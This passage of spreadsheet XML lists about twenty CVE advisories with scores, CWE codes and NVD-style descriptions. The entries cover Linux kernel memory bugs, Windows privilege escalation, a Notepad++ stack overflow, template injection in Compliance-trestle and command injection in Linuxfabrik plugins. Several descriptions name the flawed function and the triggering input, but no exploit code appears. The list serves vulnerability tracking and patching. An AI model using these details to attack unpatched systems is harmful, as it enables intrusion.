      <c r="A2067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49932</t>
        </is>
      </c>
      <c r="C2067" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2067" s="5" t="inlineStr"/>
      <c r="F2067" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2067" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2067" s="5" t="inlineStr"/>
      <c r="I2067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2067" s="5" t="inlineStr"/>
      <c r="K2067" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2067" s="5" t="inlineStr">
        <is>
          <t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t>
        </is>
      </c>
    </row>
    <row r="2068">
      <c r="A2068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52489</t>
        </is>
      </c>
      <c r="C2068" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2068" s="5" t="inlineStr"/>
      <c r="F2068" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2068" s="5" t="inlineStr"/>
      <c r="H2068" s="5" t="inlineStr"/>
      <c r="I2068" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2068" s="5" t="inlineStr"/>
      <c r="K2068" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2068" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in gpac 31becc9e08b88e525a4a62013a4000de1c0f8fd9 allows an attacker to execute arbitrary code via the svgNameToImplementationName() function</t>
        </is>
      </c>
      <c r="M2068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52489</t>
        </is>
      </c>
    </row>
    <row r="2069">
      <c r="A2069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52492</t>
        </is>
      </c>
      <c r="C2069" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2069" s="5" t="inlineStr"/>
      <c r="F2069" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2069" s="5" t="inlineStr"/>
      <c r="H2069" s="5" t="inlineStr"/>
      <c r="I2069" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2069" s="5" t="inlineStr"/>
      <c r="K2069" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2069" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libtiff rgb2ycbcr utility's cvtRaster() function when computing strip buffer sizes can result in an undersized heap allocation and subsequent heap-based buffer overflow during YCbCr conversion of a crafted TIFF image</t>
        </is>
      </c>
      <c r="M2069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52492</t>
        </is>
      </c>
    </row>
    <row r="2070">
      <c r="A2070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52987</t>
        </is>
      </c>
      <c r="C2070" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2070" s="5" t="inlineStr"/>
      <c r="F2070" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2070" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2070" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2070" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2070" s="5" t="inlineStr"/>
      <c r="K2070" s="5" t="inlineStr">
        <is>
          <t>CWE-1341</t>
        </is>
      </c>
      <c r="L2070" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: avoid double drm_exec_fini() in userq validate
When new_addition is true, amdgpu_userq_vm_validate() calls
drm_exec_fini(&amp;exec) before iterating over the collected HMM ranges and
calling amdgpu_ttm_tt_get_user_pages().
If amdgpu_ttm_tt_get_user_pages() fails in that path, the code jumps to
unlock_all and calls drm_exec_fini(&amp;exec) a second time on the same
exec object. drm_exec_fini() is not idempotent: it frees exec-&gt;objects
and may also drop exec-&gt;contended and finalize the ww acquire context.
Route that error path directly to the range cleanup once exec has
already been finalized.
Issue found using a prototype static analysis tool
and confirmed by code review.
(cherry picked from commit 2802952e4a07306da6ebe813ff1acacc5691851a)</t>
        </is>
      </c>
      <c r="M2070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52987</t>
        </is>
      </c>
    </row>
    <row r="2071">
      <c r="A2071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53000</t>
        </is>
      </c>
      <c r="C2071" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2071" s="5" t="inlineStr"/>
      <c r="F2071" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2071" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2071" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2071" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2071" s="5" t="inlineStr"/>
      <c r="K2071" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L2071" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nat: use kfree_rcu to release ops
Florian Westphal says:
"Historically this is not an issue, even for normal base hooks: the data
path doesn't use the original nf_hook_ops that are used to register the
callbacks.
However, in v5.14 I added the ability to dump the active netfilter
hooks from userspace.
This code will peek back into the nf_hook_ops that are available
at the tail of the pointer-array blob used by the datapath.
The nat hooks are special, because they are called indirectly from
the central nat dispatcher hook. They are currently invisible to
the nfnl hook dump subsystem though.
But once that changes the nat ops structures have to be deferred too."
Update nf_nat_register_fn() to deal with partial exposition of the hooks
from error path which can be also an issue for nfnetlink_hook.</t>
        </is>
      </c>
      <c r="M2071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53000</t>
        </is>
      </c>
    </row>
    <row r="2072">
      <c r="A2072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53009</t>
        </is>
      </c>
      <c r="C2072" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2072" s="5" t="inlineStr"/>
      <c r="F2072" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2072" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2072" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I2072" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2072" s="5" t="inlineStr"/>
      <c r="K2072" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L2072" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ice: fix double-free of tx_buf skb
If ice_tso() or ice_tx_csum() fail, the error path in
ice_xmit_frame_ring() frees the skb, but the 'first' tx_buf still points
to it and is marked as valid (ICE_TX_BUF_SKB).
'next_to_use' remains unchanged, so the potential problem will
likely fix itself when the next packet is transmitted and the tx_buf
gets overwritten. But if there is no next packet and the interface is
brought down instead, ice_clean_tx_ring() -&gt; ice_unmap_and_free_tx_buf()
will find the tx_buf and free the skb for the second time.
The fix is to reset the tx_buf type to ICE_TX_BUF_EMPTY in the error
path, so that ice_unmap_and_free_tx_buf().
Move the initialization of 'first' up, to ensure it's already valid in
case we hit the linearization error path.
The bug was spotted by AI while I had it looking for something else.
It also proposed an initial version of the patch.
I reproduced the bug and tested the fix by adding code to inject
failures, on a build with KASAN.
I looked for similar bugs in related Intel drivers and did not find any.</t>
        </is>
      </c>
      <c r="M2072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53009</t>
        </is>
      </c>
    </row>
    <row r="2073">
      <c r="A2073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53016</t>
        </is>
      </c>
      <c r="C2073" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2073" s="5" t="inlineStr"/>
      <c r="F2073" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2073" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2073" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2073" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2073" s="5" t="inlineStr"/>
      <c r="K2073" s="5" t="inlineStr">
        <is>
          <t>CWE-787, CWE-805</t>
        </is>
      </c>
      <c r="L2073" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: ccp - copy IV using skcipher ivsize
AF_ALG rfc3686-ctr-aes-ccp requests pass an 8-byte IV to the driver.
ccp_aes_complete() restores AES_BLOCK_SIZE bytes into the caller's IV
buffer while RFC3686 skciphers expose an 8-byte IV, so the restore
overruns the provided buffer.
Use crypto_skcipher_ivsize() to copy only the algorithm's IV length.</t>
        </is>
      </c>
      <c r="M2073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53016</t>
        </is>
      </c>
    </row>
    <row r="2074">
      <c r="A2074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53185</t>
        </is>
      </c>
      <c r="C2074" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2074" s="5" t="inlineStr"/>
      <c r="F2074" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2074" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2074" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2074" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J2074" s="5" t="inlineStr"/>
      <c r="K2074" s="5" t="inlineStr">
        <is>
          <t>CWE-364, CWE-416</t>
        </is>
      </c>
      <c r="L2074" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix use-after-free in zram_bvec_write_partial()
zram_read_page() picks the sync or async backing device read path based on
whether the parent bio is NULL.  zram_bvec_write_partial() passes its
parent bio down, so for ZRAM_WB slots the read is dispatched
asynchronously and zram_read_page() returns 0 while the bio is still in
flight.  The caller then runs memcpy_from_bvec(), zram_write_page() and
__free_page() on the buffer, leaving the async read to write into a freed
page.
zram_bvec_read_partial() was switched to NULL in commit 4e3c87b9421d
("zram: fix synchronous reads") for the same reason; the write_partial
counterpart was missed.</t>
        </is>
      </c>
      <c r="M2074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53185</t>
        </is>
      </c>
    </row>
    <row r="2075">
      <c r="A2075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54757</t>
        </is>
      </c>
      <c r="C2075" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2075" s="5" t="inlineStr"/>
      <c r="F2075" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2075" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2075" s="5" t="inlineStr"/>
      <c r="I2075" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2075" s="5" t="inlineStr"/>
      <c r="K2075" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2075" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, Trestle is vulnerable to server-side template injection that can lead to remote code execution. This occurs because the MDCleanInclude and MDSectionInclude Jinja2 tags re-parse untrusted Markdown content as template source code using a non-sandboxed jinja2.Environment. An attacker who controls content that Trestle renders, such as a crafted workspace Markdown file, a third-party SSP document, or a YAML lookup-table value, can inject a Jinja2 expression that traverses Python object internals to execute arbitrary operating system commands in the context of the Trestle process. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M2075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54757</t>
        </is>
      </c>
    </row>
    <row r="2076">
      <c r="A2076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54758</t>
        </is>
      </c>
      <c r="C2076" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2076" s="5" t="inlineStr"/>
      <c r="F2076" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2076" s="5" t="inlineStr"/>
      <c r="H2076" s="5" t="inlineStr"/>
      <c r="I2076" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2076" s="5" t="inlineStr"/>
      <c r="K2076" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-787</t>
        </is>
      </c>
      <c r="L2076" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, the expandNppEnvironmentStrs function in PowerEditor/src/WinControls/StaticDialog/RunDlg/RunDlg.cpp copies a Notepad++ variable name between $( and ) into the fixed-size wchar_t str[MAX_PATH] stack buffer without bounding the m loop index, allowing a name of 260 or more characters to corrupt adjacent stack data, terminate the process through __report_gsfailure, and potentially execute code. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M2076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54758</t>
        </is>
      </c>
    </row>
    <row r="2077">
      <c r="A2077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55273</t>
        </is>
      </c>
      <c r="C2077" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2077" s="5" t="inlineStr"/>
      <c r="F2077" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2077" s="5" t="inlineStr"/>
      <c r="H2077" s="5" t="inlineStr"/>
      <c r="I2077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2077" s="5" t="inlineStr"/>
      <c r="K2077" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2077" s="5" t="inlineStr">
        <is>
          <t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t>
        </is>
      </c>
    </row>
    <row r="2078">
      <c r="A2078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55285</t>
        </is>
      </c>
      <c r="C2078" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2078" s="5" t="inlineStr"/>
      <c r="F2078" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2078" s="5" t="inlineStr"/>
      <c r="H2078" s="5" t="inlineStr"/>
      <c r="I2078" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2078" s="5" t="inlineStr"/>
      <c r="K2078" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2078" s="5" t="inlineStr">
        <is>
          <t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t>
        </is>
      </c>
    </row>
    <row r="2079">
      <c r="A2079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55294</t>
        </is>
      </c>
      <c r="C2079" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2079" s="5" t="inlineStr"/>
      <c r="F2079" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2079" s="5" t="inlineStr"/>
      <c r="H2079" s="5" t="inlineStr"/>
      <c r="I2079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2079" s="5" t="inlineStr"/>
      <c r="K2079" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2079" s="5" t="inlineStr">
        <is>
          <t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t>
        </is>
      </c>
    </row>
    <row r="2080">
      <c r="A2080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55426</t>
        </is>
      </c>
      <c r="C2080" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2080" s="5" t="inlineStr"/>
      <c r="F2080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2080" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2080" s="5" t="inlineStr"/>
      <c r="I2080" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2080" s="5" t="inlineStr"/>
      <c r="K2080" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2080" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations, and Linuxfabrik Monitoring Plugins uses those modules to run external monitoring commands. From the earliest affected releases until linuxfabrik-lib 5.0.0 and Linuxfabrik Monitoring Plugins 6.0.0, check plugins embedded user-controlled values in command strings passed to lib.shell.shell_exec(), which split strings at pipe characters and executed the resulting commands. In check-plugins/restic-check/restic-check, the --repo parameter could inject a pipe-delimited command into a constructed restic invocation, and sudo-authorized execution allowed a compromised nagios or icinga account to run that command as root. The shared library also accepted command strings and a shell parameter, while numerous plugins constructed external commands from attacker-influenced arguments. The fixes require argv lists, always use shell=False, remove pipe splitting, and reject option-like positional values through lib.shell.safe_cli_value(). These issues are fixed in linuxfabrik-lib 5.0.0 and Linuxfabrik Monitoring Plugins 6.0.0.</t>
        </is>
      </c>
      <c r="M2080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55426</t>
        </is>
      </c>
    </row>
    <row r="2081">
      <c r="A2081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55522</t>
        </is>
      </c>
      <c r="C2081" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2081" s="5" t="inlineStr"/>
      <c r="F2081" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2081" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2081" s="5" t="inlineStr"/>
      <c r="I2081" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2081" s="5" t="inlineStr"/>
      <c r="K2081" s="5" t="inlineStr">
        <is>
          <t>CWE-426, CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L2081" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions 3.9.26 through 4.6.57 of praiseonai and 0.12.12 through 1.6.57 of praiseonaiagents, the workflow "include" feature is vulnerable to code execution. Workflow._execute_include() implicitly imports and runs an included recipe's tools.py via a raw importlib.util.spec_from_file_location() and spec.loader.exec_module() call, without honoring the PRAISONAI_ALLOW_TEMPLATE_TOOLS/PRAISONAI_ALLOW_LOCAL_TOOLS autoload opt-in gates or routing through the centralized safe loader that protects the other tools.py autoload paths. As a result, a workflow that includes an attacker-controlled local recipe directory executes arbitrary module-level Python code during include setup, before any child workflow parsing or model call, and the same sink is reachable through the higher-level praisonai.recipe.run() recipe API. An attacker who can cause a victim process to run a workflow or recipe that includes an untrusted local recipe achieves arbitrary Python code execution as the PraisonAI process user, a variant that bypasses the hardening applied to the previously disclosed automatic tools.py RCE advisory family. This issue has been fixed in version 4.6.58 of praisonai and 1.6.58 of praisonaiagents.</t>
        </is>
      </c>
      <c r="M2081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55522</t>
        </is>
      </c>
    </row>
    <row r="2082">
      <c r="A2082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="C2082" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2082" s="5" t="inlineStr"/>
      <c r="F2082" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2082" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2082" s="5" t="inlineStr"/>
      <c r="I2082" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2082" s="5" t="inlineStr"/>
      <c r="K2082" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2082" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="2083">
      <c r="A2083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="C2083" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2083" s="5" t="inlineStr"/>
      <c r="F2083" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2083" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2083" s="5" t="inlineStr"/>
      <c r="I2083" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2083" s="5" t="inlineStr"/>
      <c r="K2083" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2083" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="2084">
      <c r="A2084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56198</t>
        </is>
      </c>
      <c r="C2084" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2084" s="5" t="inlineStr"/>
      <c r="F2084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2084" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2084" s="5" t="inlineStr"/>
      <c r="I2084" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2084" s="5" t="inlineStr"/>
      <c r="K2084" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2084" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t>
        </is>
      </c>
    </row>
    <row r="2085">
      <c r="A2085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57170</t>
        </is>
      </c>
      <c r="C2085" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2085" s="5" t="inlineStr"/>
      <c r="F2085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2085" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2085" s="5" t="inlineStr"/>
      <c r="I2085" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2085" s="5" t="inlineStr"/>
      <c r="K2085" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L2085" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions prior to 3.12.4 and 4.0.0 through 4.0.3, the custom Jinja2 include tags mdsection_include and md_clean_include re-parse the content of an included Markdown file as Jinja2 template code in a non-sandboxed environment, allowing server-side template injection that can lead to arbitrary code execution. The MDSectionInclude and MDCleanInclude tags in Trestle/core/jinja/tags.py pass included file content to Parser(self.environment, ...).parse(), splicing it into the host template's compilation, and the environment is a plain jinja2.Environment rather than a SandboxedEnvironment, so any expressions in the file are evaluated with full access to the usual SSTI gadget chain. Because Trestle's Markdown writers emit OSCAL prose and component-description fields verbatim, applying delimiter neutralization only to parameter tables, attacker-controlled OSCAL data such as a control statement, part prose, or component description containing Jinja2 syntax flows into an included Markdown file and is executed when the include tag re-parses it. This issue is fixed in version 4.1.0.</t>
        </is>
      </c>
      <c r="M2085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57170</t>
        </is>
      </c>
    </row>
    <row r="2086">
      <c r="A2086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2086" s="5" t="inlineStr">
